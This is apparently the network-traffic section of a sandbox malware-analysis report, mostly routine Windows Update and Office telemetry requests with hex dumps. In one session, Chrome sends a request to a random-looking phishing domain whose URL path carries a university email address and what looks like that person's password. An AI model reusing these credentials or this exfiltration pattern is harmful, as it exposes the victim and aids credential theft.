                                                                                                                                                                2024-11-23 19:36:39 UTC16384INData Raw: 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f
                                                                                                                                                                Data Ascii: > </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </
                                                                                                                                                                2024-11-23 19:36:39 UTC16384INData Raw: 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                2024-11-23 19:36:39 UTC16384INData Raw: 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20
                                                                                                                                                                Data Ascii: tus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                23192.168.2.44977620.12.23.50443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:38 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=3dlPWuYzpmE9uAb&MD=Snkb7rNX HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                Host: slscr.update.microsoft.com
                                                                                                                                                                2024-11-23 19:36:39 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                Expires: -1
                                                                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                MS-CorrelationId: bfe5fe39-2839-4f0a-bef1-e33579f1f91a
                                                                                                                                                                MS-RequestId: 5f8d263f-1cc9-4f46-9c00-ca21709436fd
                                                                                                                                                                MS-CV: 4xk8uyG+IU6Be/Q7.0
                                                                                                                                                                X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:39 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Length: 30005
                                                                                                                                                                2024-11-23 19:36:39 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                2024-11-23 19:36:39 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                24192.168.2.44977787.120.114.1724434888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:41 UTC578OUTGET /O365/username/hmoon%40nova.edu/gTZ)sadwg%3Fy3%40tST HTTP/1.1
                                                                                                                                                                Host: nova-drive.xkndniwljldraoauu.com
                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                Origin: http://nova-drive.xkndniwljldraoauu.com
                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Sec-WebSocket-Key: 8DpvXvEqlmvCrZ6mF+7E2A==
                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                2024-11-23 19:36:41 UTC206INHTTP/1.1 400 Bad Request
                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                Sec-Websocket-Version: 13
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:41 GMT
                                                                                                                                                                Content-Length: 148
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-11-23 19:36:41 UTC148INData Raw: 42 61 64 20 52 65 71 75 65 73 74 0a 45 72 72 6f 72 20 55 70 67 72 61 64 69 6e 67 20 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 77 65 62 73 6f 63 6b 65 74 3a 20 74 68 65 20 63 6c 69 65 6e 74 20 69 73 20 6e 6f 74 20 75 73 69 6e 67 20 74 68 65 20 77 65 62 73 6f 63 6b 65 74 20 70 72 6f 74 6f 63 6f 6c 3a 20 27 75 70 67 72 61 64 65 27 20 74 6f 6b 65 6e 20 6e 6f 74 20 66 6f 75 6e 64 20 69 6e 20 27 43 6f 6e 6e 65 63 74 69 6f 6e 27 20 68 65 61 64 65 72 0a
                                                                                                                                                                Data Ascii: Bad RequestError Upgrading Connection: websocket: the client is not using the websocket protocol: 'upgrade' token not found in 'Connection' header


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                25192.168.2.44978113.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:41 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:41 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 408
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                x-ms-request-id: a3d07856-b01e-0084-3a7e-3bd736000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193641Z-174c587ffdfb74xqhC1TEBhabc00000003ag00000000gzxg
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:42 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                26192.168.2.44977913.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:41 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:42 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 450
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                x-ms-request-id: 05856cf7-f01e-0020-4060-3b956b000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193642Z-178bfbc474b9fdhphC1NYCac0n00000004vg000000007r2u
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:42 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                27192.168.2.44978013.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:41 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:42 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:42 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 3788
                                                                                                                                                                Connection: close
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                x-ms-request-id: 1c744767-001e-0082-6060-3b5880000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193642Z-178bfbc474bbbqrhhC1NYCvw7400000004z000000000kbgf
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:42 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                28192.168.2.44978213.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:41 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:42 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:42 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 2160
                                                                                                                                                                Connection: close
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                x-ms-request-id: 2aa1f1ad-b01e-003d-7c43-3cd32c000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193642Z-174c587ffdfcj798hC1TEB9bq400000003f000000000m8qu
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:42 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                29192.168.2.44977813.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:41 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:42 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:42 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 2980
                                                                                                                                                                Connection: close
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                x-ms-request-id: 89a9fa5c-d01e-0017-5438-3cb035000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193642Z-178bfbc474bbcwv4hC1NYCypys00000004v0000000002fhg
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:42 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                30192.168.2.44978413.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:43 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:44 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 474
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                ETag: "0x8DC582B9964B277"
                                                                                                                                                                x-ms-request-id: 657d02d2-201e-0033-2f57-3cb167000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193644Z-178bfbc474bwlrhlhC1NYCy3kg00000004v000000000gtrp
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:44 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                31192.168.2.44978513.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:43 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
